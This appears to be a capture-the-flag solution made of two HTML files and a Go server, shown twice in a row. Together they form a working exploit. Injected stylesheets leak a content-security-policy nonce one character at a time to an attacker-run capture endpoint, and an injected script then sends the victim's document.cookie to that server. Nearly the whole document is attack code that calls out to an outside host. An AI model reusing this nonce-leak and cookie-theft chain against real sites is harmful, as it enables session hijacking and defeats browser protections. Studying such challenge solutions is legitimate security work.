rekkusu/getflag.html

## getflag.html
<script>
  fetch('/nonce').then(r => r.text()).then(nonce => {
    document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>');
  });
</script>

## index.html
<iframe src="http://35.187.214.138:10023/?q=<base href=//[server]><meta http-equiv='Content-Style-Type' content=text/css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css>"></iframe>

<script>
  setTimeout(function() { location.href = "http://[server]/getflag"; }, 1000);
</script>

## solver.go
package main

import (
	"strings"
	"sync"

	"github.com/labstack/echo"
	"github.com/labstack/echo/middleware"
)

func main() {
	e := echo.New()
	mutex := new(sync.Mutex)
	nonce := ""

	e.Use(middleware.LoggerWithConfig(middleware.LoggerConfig{
		Format: "${status} ${uri}\n",
	}))

	e.Static("/", "index.html")
	e.Static("/getflag", "getflag.html")

	e.GET("/capture", func(c echo.Context) error {
		mutex.Unlock()
		nonce = c.QueryParam("value")
		return c.NoContent(200)
	})

	e.GET("/log.css", func(c echo.Context) error {
		mutex.Lock()

		template := "*[nonce^='CH'] {background-image: url(http://[server]/capture?value=CH);}\n"
		chars := "0123456789abcdef"

		css := ""
		for i := 0; i < 0x10; i++ {
			css += strings.Replace(template, "CH", nonce+string(chars[i]), -1)
		}

		c.Response().Header().Set("Cache-Control", "private, no-store, no-cache, must-revalidate")

		return c.Blob(200, "text/css", []byte(css))
	})

	e.GET("/nonce", func(c echo.Context) error {
		return c.String(200, nonce)
	})

	e.Start(":10000")
}
	<script>
	fetch('/nonce').then(r => r.text()).then(nonce => {
	document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>');
	});
	</script>
	<iframe src="http://35.187.214.138:10023/?q=<base href=//[server]><meta http-equiv='Content-Style-Type' content=text/css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css>"></iframe>

	<script>
	setTimeout(function() { location.href = "http://[server]/getflag"; }, 1000);
	</script>
	package main

	import (
	"strings"
	"sync"

	"github.com/labstack/echo"
	"github.com/labstack/echo/middleware"
	)

	func main() {
	e := echo.New()
	mutex := new(sync.Mutex)
	nonce := ""

	e.Use(middleware.LoggerWithConfig(middleware.LoggerConfig{
	Format: "${status} ${uri}\n",
	}))

	e.Static("/", "index.html")
	e.Static("/getflag", "getflag.html")

	e.GET("/capture", func(c echo.Context) error {
	mutex.Unlock()
	nonce = c.QueryParam("value")
	return c.NoContent(200)
	})

	e.GET("/log.css", func(c echo.Context) error {
	mutex.Lock()

	template := "*[nonce^='CH'] {background-image: url(http://[server]/capture?value=CH);}\n"
	chars := "0123456789abcdef"

	css := ""
	for i := 0; i < 0x10; i++ {
	css += strings.Replace(template, "CH", nonce+string(chars[i]), -1)
	}

	c.Response().Header().Set("Cache-Control", "private, no-store, no-cache, must-revalidate")

	return c.Blob(200, "text/css", []byte(css))
	})

	e.GET("/nonce", func(c echo.Context) error {
	return c.String(200, nonce)
	})

	e.Start(":10000")
	}